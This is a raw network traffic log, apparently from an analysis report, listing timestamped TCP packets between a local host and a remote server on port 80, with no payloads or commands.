Apr 19, 2022 16:44:40.131294966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.131330967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.131416082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.131534100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.131601095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.131669044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.131730080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.131799936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.131901026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.132004976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.132062912 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.132101059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.132158041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.132227898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.132344961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.132463932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.132523060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.132587910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.132654905 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.132705927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.132857084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.132941961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.133006096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.133054972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.133116961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.133156061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.133305073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.133384943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.133439064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.133466959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.133519888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.133661032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.133688927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.133743048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.133826017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.133909941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.134032965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.134104013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.134124041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.134177923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.134270906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.134354115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.134471893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.134557962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.134620905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.134708881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.134793043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.134823084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.134895086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.134943008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.135065079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.135185957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.135211945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.135349989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.135421991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.135461092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.135601997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.135627985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.135660887 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.135730982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.135849953 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.135874987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.135987997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.136050940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.136061907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.136226892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.136288881 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.136336088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.136461020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.136580944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.136634111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.136657000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.136710882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.136778116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.136853933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.136903048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.136969090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.137140036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.137211084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.137219906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.137347937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.137456894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.137530088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.137541056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.137658119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.137712955 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.137778997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.137900114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.137950897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.137979031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.138030052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.138139009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.138252020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.138314009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.138339996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.138451099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.138581991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.138633966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.138673067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.138724089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.138786077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.138870955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.139053106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.139102936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.139139891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.139194012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.139261007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.139427900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.139453888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.139484882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.139622927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.139781952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.139836073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.139838934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.139889002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.139933109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.140048027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.140120983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.140171051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.140249968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.140315056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.140366077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.140491009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.140611887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.140667915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.140718937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.140769005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.140851021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.140908957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.141140938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.141191959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.141206026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.141262054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.426556110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.426629066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.426681042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.426722050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.426768064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.426805019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.426827908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.426991940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.427031994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.427056074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.427140951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.427200079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.427305937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.427429914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.427470922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.427484035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.427612066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.427674055 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.427714109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.427759886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.427809954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.427887917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.428070068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.428138018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.428185940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.428348064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.428386927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.428422928 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.428491116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.428545952 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.428592920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.428741932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.428786039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.428802013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.428908110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.428962946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.429033995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.429136038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.429193020 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.429264069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.429394960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.429450035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.429502010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.429641008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.429702997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.429738045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.429898024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.429941893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.429961920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.430064917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.430125952 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.430205107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.430346966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.430389881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.430403948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.430502892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.430555105 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.430655003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.430752039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.430807114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.430953979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.430998087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.431052923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.431086063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.431186914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.431238890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.431297064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.431447983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.431505919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.431550980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.431708097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.431763887 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.431866884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.431910992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.431979895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.432012081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.432135105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.432188034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.432312965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.432359934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.432425022 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.432454109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.432594061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.432648897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.432754040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.432820082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.432871103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.432938099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.433078051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.433120012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.433134079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.433221102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.433278084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.433346987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.433476925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.433540106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.433578014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.433818102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.433871031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.433886051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.433913946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.433964014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.434016943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.434204102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.434247017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.434264898 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.434429884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.434490919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.434547901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.434588909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.434643030 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.434746981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.434813976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.434869051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.434928894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.435054064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.435111046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.435172081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.435255051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.435311079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.435412884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.435544968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.435720921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.435750961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.435765028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.435817957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.435889959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.435967922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.436019897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.436085939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.436193943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.436249971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.436300039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.436436892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.436495066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.436707973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.436759949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.436814070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.436820984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.436852932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.436902046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.436980009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.437088966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.437146902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.437254906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.437362909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.437407970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.437421083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.437561035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.437613010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.437675953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.437752962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.437808990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.437877893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.437987089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.438041925 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.438114882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.438328981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.438373089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.438395977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.438472033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.438530922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.438554049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.438762903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.438824892 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.438932896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.438973904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.439033985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.439073086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.439147949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.439198017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.439270020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.525279999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.722455025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.722517014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.722556114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.722598076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.722743988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.722745895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.722801924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.722925901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.722989082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.722990990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.723032951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.723097086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.723248005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.723409891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.723453999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.723473072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.723536015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.723593950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.723665953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.723774910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.723845959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.723862886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.724004030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.724060059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.724134922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.724178076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.724235058 CEST	49758	80	192.168.2.4	45.135.48.153
